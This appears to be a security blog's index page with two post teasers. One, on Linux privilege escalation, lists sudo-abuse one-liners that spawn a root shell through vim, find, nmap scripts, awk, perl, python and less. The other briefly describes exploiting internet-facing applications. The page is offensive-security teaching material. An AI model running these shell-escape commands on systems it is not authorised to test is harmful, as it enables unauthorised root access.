HADESS
Cyber Security Magic
40 Methods For Privilege Escalation Part 1

40 Methods for Privilege Escalation(Part 1)

Abusing Sudo Binaries Domain: No Local Admin: Yes OS: Linux Type:  Abusing Privileged Files Methods:  sudo vim -c ‘:!/bin/bash’ sudo find / etc/passwd -exec /bin/bash \; echo “os.execute(‘/bin/bash/’)” > /tmp/shell.nse && sudo nmap –script=/tmp/shell.nse sudo env /bin/bash sudo awk ‘BEGIN {system(“/bin/bash”)}’ sudo perl -e ‘exec “/bin/bash”;’ sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’ sudo less /etc/hosts –…

Read More
Attacked From Behind Application

Attacked From Behind Application(EBook)

Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. Theseapplications are often websites, but can include databases (like SQL), standard services…

Read More